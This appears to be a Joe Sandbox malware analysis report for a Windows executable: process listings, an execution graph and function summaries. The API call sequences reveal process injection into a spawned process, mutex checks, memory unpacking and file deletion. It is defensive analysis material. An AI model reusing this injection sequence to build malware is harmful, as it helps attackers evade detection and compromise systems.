                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:40
                                                                                                                                                              Start time:20:41:36
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:41
                                                                                                                                                              Start time:20:41:36
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:42
                                                                                                                                                              Start time:20:41:36
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:43
                                                                                                                                                              Start time:20:41:37
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:44
                                                                                                                                                              Start time:20:41:37
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:45
                                                                                                                                                              Start time:20:41:37
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Disassembly

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:9.9%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                Signature Coverage:11%
                                                                                                                                                                Total number of Nodes:209
                                                                                                                                                                Total number of Limit Nodes:7
                                                                                                                                                                execution_graph 2985 401000 2986 40100c 2985->2986 2986->2986 2987 401045 VirtualAlloc 2986->2987 2988 401073 2987->2988 3184 2232f63 3185 2232f68 3184->3185 3186 2232f6e lstrlen 3185->3186 3187 2232f85 3186->3187 3169 2234981 3170 2234994 3169->3170 3171 2234a87 3170->3171 3172 22349d2 CreateEventA 3170->3172 3174 22349f5 3172->3174 3173 2234d77 WaitForSingleObject 3173->3174 3174->3171 3174->3173 2989 2230000 2991 2230005 2989->2991 3006 2230ce8 2991->3006 2993 2230011 3009 22333ca 2993->3009 2995 2230016 3013 223098b OpenMutexA 2995->3013 2998 223038f 2999 223002e 2999->2998 3000 2230697 2999->3000 3028 22306a0 2999->3028 3034 22306e6 3000->3034 3003 2230833 3004 22306dd 3004->3003 3038 2230835 3004->3038 3048 2230c63 GetPEB 3006->3048 3008 2230ced 3008->2993 3010 22333ea 3009->3010 3050 2233409 GetVolumeInformationA 3010->3050 3012 2233405 3012->2995 3014 22309b3 GetStartupInfoA 3013->3014 3015 223001b ExitProcess 3013->3015 3052 22309fd 3014->3052 3015->2999 3017 22309f6 3017->3015 3018 2230a02 CreateProcessA 3017->3018 3019 2230a12 Wow64GetThreadContext 3018->3019 3020 2230b10 3018->3020 3019->3020 3022 2230a3a VirtualProtectEx 3019->3022 3020->3015 3065 2230b17 3020->3065 3022->3020 3023 2230a65 DuplicateHandle 3022->3023 3023->3020 3024 2230aa6 WriteProcessMemory 3023->3024 3024->3020 3025 2230ad4 ResumeThread 3024->3025 3026 2230ae5 Sleep OpenMutexA 3025->3026 3026->3015 3027 2230b0b 3026->3027 3027->3020 3027->3026 3029 22306a5 3028->3029 3030 22306e6 3 API calls 3029->3030 3032 22306dd 3030->3032 3031 2230833 3031->3000 3032->3031 3033 2230835 3 API calls 3032->3033 3033->3031 3036 22306eb 3034->3036 3035 2230833 3035->3004 3036->3035 3037 2230835 3 API calls 3036->3037 3037->3035 3041 2230864 3038->3041 3039 22308fd 3 API calls 3040 2230887 3039->3040 3042 223088a 3040->3042 3043 2230ce8 GetPEB 3040->3043 3041->3039 3041->3040 3041->3042 3042->3003 3044 2230909 3043->3044 3045 2230667 3 API calls 3044->3045 3047 2230913 3045->3047 3046 2230962 3 API calls 3046->3047 3047->3046 3049 2230c6f 3048->3049 3049->3008 3049->3049 3051 223342b 3050->3051 3051->3012 3067 2233677 3052->3067 3054 2230a02 CreateProcessA 3055 2230a12 Wow64GetThreadContext 3054->3055 3056 2230b10 3054->3056 3055->3056 3059 2230a3a VirtualProtectEx 3055->3059 3057 2230b15 3056->3057 3058 2230b17 6 API calls 3056->3058 3057->3017 3058->3057 3059->3056 3060 2230a65 DuplicateHandle 3059->3060 3060->3056 3061 2230aa6 WriteProcessMemory 3060->3061 3061->3056 3062 2230ad4 ResumeThread 3061->3062 3063 2230ae5 Sleep OpenMutexA 3062->3063 3063->3057 3064 2230b0b 3063->3064 3064->3056 3064->3063 3069 2230b25 3065->3069 3068 2233689 3067->3068 3068->3054 3068->3068 3070 2230ce8 GetPEB 3069->3070 3071 2230b31 3070->3071 3076 2230b4b 3071->3076 3073 2230b44 3082 2230b89 3073->3082 3077 2233677 3076->3077 3078 2230b50 LoadLibraryA 3077->3078 3079 2230b66 3078->3079 3080 2230b89 5 API calls 3079->3080 3081 2230b7b 3079->3081 3080->3081 3081->3073 3083 2230b8e 3082->3083 3084 2230bd0 3083->3084 3086 2230ba1 OpenProcess 3083->3086 3092 22308d7 3084->3092 3086->3084 3089 2230bb2 3086->3089 3089->3084 3090 2230bc8 ExitProcess 3089->3090 3097 22308dd 3092->3097 3101 22308fd 3097->3101 3102 2230ce8 GetPEB 3101->3102 3103 2230909 3102->3103 3107 2230667 3103->3107 3106 2230913 3115 2230962 3106->3115 3108 223066a 3107->3108 3109 22306a0 3 API calls 3108->3109 3110 2230697 3109->3110 3111 22306e6 3 API calls 3110->3111 3113 22306dd 3111->3113 3112 2230833 3112->3106 3113->3112 3114 2230835 3 API calls 3113->3114 3114->3112 3116 2230ce8 GetPEB 3115->3116 3117 223096e 3116->3117 3118 2230978 Sleep RtlExitUserThread 3117->3118 3119 2040000 VirtualProtect 3120 204034e 3119->3120 3121 20406d0 VirtualProtect 3120->3121 3122 2040528 VirtualProtect 3120->3122 3122->3120 3123 22338a7 3124 22338ac 3123->3124 3127 22338f2 3124->3127 3131 223260c 3127->3131 3132 223261a 3131->3132 3188 2233d6a 3189 2233d6f 3188->3189 3190 22339d7 2 API calls 3189->3190 3191 2233d8a 3190->3191 3192 223382b 2 API calls 3191->3192 3193 2233d8f 3192->3193 3194 22334ea lstrlen 3197 2232790 3194->3197 3196 2233503 VirtualFree CloseHandle 3198 22327a1 3197->3198 3198->3196 3199 22331ea 3200 22331ef 3199->3200 3201 223320d lstrcat 3200->3201 3202 223321a 3201->3202 3203 2233242 GetStartupInfoA CreateProcessA CloseHandle CloseHandle 3202->3203 3204 223329a 3202->3204 3203->3204 3205 2234d49 3206 2234d72 3205->3206 3207 2234d56 3205->3207 3207->3206 3208 2234d68 SetEvent 3207->3208 3208->3206 3175 2230b8f 3176 2230ba1 OpenProcess 3175->3176 3177 2230bd0 3176->3177 3180 2230bb2 3176->3180 3178 22308d7 3 API calls 3177->3178 3179 2230bd5 3178->3179 3181 2230c63 GetPEB 3179->3181 3180->3177 3182 2230bc8 ExitProcess 3180->3182 3183 2230bda 3181->3183 3133 2233f2c 3134 2233f5d 3133->3134 3135 2233f31 3133->3135 3136 2233f5f 3135->3136 3137 2233f4f GetModuleHandleA 3135->3137 3139 2233f6a Sleep 3136->3139 3144 223403f 3137->3144 3140 2233f9c 3139->3140 3141 2233f7a Sleep 3140->3141 3142 2233f9c 3141->3142 3143 2233f8a Sleep 3142->3143 3143->3134 3146 2234052 3144->3146 3145 22340ba 3145->3134 3146->3145 3148 22340be 3146->3148 3153 22339d7 RtlInitializeCriticalSection 3148->3153 3152 22340c8 3152->3145 3154 22339e7 VirtualAlloc 3153->3154 3154->3154 3155 22339ff 3154->3155 3156 223382b VirtualAlloc 3155->3156 3156->3156 3157 2233843 CreateThread 3156->3157 3157->3152 3158 2233f31 3159 2233f36 3158->3159 3160 2233f5f 3159->3160 3161 2233f4f GetModuleHandleA 3159->3161 3163 2233f6a Sleep 3160->3163 3162 223403f 4 API calls 3161->3162 3164 2233f5d 3162->3164 3165 2233f9c 3163->3165 3166 2233f7a Sleep 3165->3166 3167 2233f9c 3166->3167 3168 2233f8a Sleep 3167->3168 3168->3164 3209 2232951 3210 2233677 3209->3210 3211 2232956 LoadLibraryA 3210->3211 3212 223296c 3211->3212 3213 2232985 VirtualAlloc 3212->3213 3213->3213 3214 223299d 3213->3214 3232 22329ca 3214->3232 3233 2233677 3232->3233 3234 22329cf lstrcat 3233->3234 3235 22329e5 3234->3235 3249 2232a01 3235->3249 3250 2233677 3249->3250 3251 2232a06 lstrcat 3250->3251 3252 2232a1c 3251->3252 3262 2232a38 3252->3262 3263 2233677 3262->3263 3264 2232a3d lstrcat 3263->3264 3266 2232a44 3264->3266 3267 2232aae DeleteFileA 3266->3267 3268 2232af2 DeleteFileA 3266->3268 3269 2232b58 Sleep 3266->3269 3270 2232b42 DeleteFileA 3266->3270 3271 2232b71 3266->3271 3267->3266 3268->3266 3269->3266 3270->3269 3273 2232b82 3271->3273 3272 2232c65 Sleep 3272->3272 3272->3273 3273->3272 3274 2232d1b 3273->3274 3274->3266

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 23 401000-401009 24 40100c-401018 23->24 24->24 25 40101a-40102c 24->25 26 40102e-40103d 25->26 26->26 27 40103f-401043 26->27 27->26 28 401045-40106e VirtualAlloc call 401075 27->28 30 401073 28->30 30->30
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00401064
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1651887371.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.1651867182.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID: alAl
                                                                                                                                                                • API String ID: 4275171209-1316302345
                                                                                                                                                                • Opcode ID: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
                                                                                                                                                                • Instruction ID: 5af7c2372beb94d1e1b866602b7db5847228e6fe9b98f09dddad8bbdacf03bae
                                                                                                                                                                • Opcode Fuzzy Hash: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
                                                                                                                                                                • Instruction Fuzzy Hash: B1015A36A401618FD765CF18C841F41B3E1BF48325F1A81A5D989AB7A2C778FC92CB88
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02230005 Relevance: 2.6, APIs: 1, Instructions: 1116COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0223098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022309A5
                                                                                                                                                                  • Part of subcall function 0223098B: GetStartupInfoA.KERNEL32(00000000), ref: 022309BD
                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0223001D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 213680645-0
                                                                                                                                                                • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                • Instruction ID: f5d3848e1ae131f9fcf9d9035ce1570d0bbbf106777df3fab9219c8c36f54095
                                                                                                                                                                • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                • Instruction Fuzzy Hash: AA72E1E242E3C54FD7179BE04A64A667F78BF03208B0910CBD5819E0BFD6649B09C77A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02040000 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 395memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652184347.0000000002040000.00000040.00001000.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2040000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                • API String ID: 544645111-3459585926
                                                                                                                                                                • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                • Instruction ID: 9aa67840fe29e07c9ffd3953f7bcb7f2fd0f513a94b714468fd582a94542b6c4
                                                                                                                                                                • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                • Instruction Fuzzy Hash: CF3277B4E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341DB756E85CF95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022309FD Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNELBASE(00000000,022309F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02230A04
                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02230A2C
                                                                                                                                                                • VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 02230A57
                                                                                                                                                                • DuplicateHandle.KERNELBASE(000000FF,000000FF,?,02235834,00000000,00000000,00000002), ref: 02230A9C
                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 02230ACA
                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 02230ADA
                                                                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 02230AEA
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02230B01
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWow64Write
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1738979855-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: fe3856f926a676bf3fdc8fa0c0c37ff7a3f810f253ea3a9001e2f7d4e88482cc
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: 463182716102159FEF279F50CC84BA977B9FF04748F0801D4AA49FE0E9DBB09A90CE64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02233409 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 479 2233409-2233462 GetVolumeInformationA call 2233634
                                                                                                                                                                APIs
                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(02233405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02233409
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationVolume
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                                                • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction ID: 0bf4314625267529b0a732a6bd7afd8f3b14ba04a13767d9abb42c21b0816da5
                                                                                                                                                                • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction Fuzzy Hash: 46F0FE75500154DFEF02EF24C485A9A77F8AF44344F4504C8AA4DBF206CA309595CFA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 02231845 Relevance: .4, Instructions: 370COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                • Instruction ID: d1ef321f61d42a0d3f06f77403b98c5b857d4a6aacff73942b2859739c0c2a16
                                                                                                                                                                • Opcode Fuzzy Hash: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                • Instruction Fuzzy Hash: 7DC1F7A54286878EE7178E98C0593D2BFD6BB12318F4893C9C19D4F2DBC36981E9C7D1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02230EA9 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                • Instruction ID: 639b8e4c648f16845a7acfb299fea36a2729e31a94a3c932e9d459fd17e03abf
                                                                                                                                                                • Opcode Fuzzy Hash: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                • Instruction Fuzzy Hash: BBB12CA16387878AE7278A98C4153D2BF91BB12328F085389C5DD0F5EBC3B582D9C7D1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02230C63 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f1cf879b00919bdefd480fb5a14bd237a5ae1218ef57fef6b742790238e8c1a6
                                                                                                                                                                • Instruction ID: 2f9a4e0528707f7fcedbeda766c87151f8b726e0123640c09763cd4513bfca68
                                                                                                                                                                • Opcode Fuzzy Hash: f1cf879b00919bdefd480fb5a14bd237a5ae1218ef57fef6b742790238e8c1a6
                                                                                                                                                                • Instruction Fuzzy Hash: 7CD0C579621550CFCA56CB58C1D8E10B3B1FB48764B0A8495E80A8B766C335ED46DE10
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02232951 Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(02232949,00000008,?,00000000,02232835,00000000), ref: 02232956
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02232993
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022329C1), ref: 022329D0
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022329F8), ref: 02232A07
                                                                                                                                                                • lstrcat.KERNEL32(00000000,02232A2F), ref: 02232A3E
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AB8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02232AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02232B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02232B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1652248579.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2230000_java.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 675344582-0
                                                                                                                                                                • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction ID: 09ae55a0c74aadddebed18a38829510196056ad4f451233275a5871ea798c354
                                                                                                                                                                • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction Fuzzy Hash: 785162F1410314DEDB23AFB08D48FAB77BDFF40705F4445A5AE85EA059EA349A80CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022329CA Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022329C1), ref: 022329D0
                                                                                                                                                                  • Part of subcall function 02232A01: lstrcat.KERNEL32(00000000,022329F8), ref: 02232A07
                                                                                                                                                                  • Part of subcall function 02232A01: lstrcat.KERNEL32(00000000,02232A2F), ref: 02232A3E
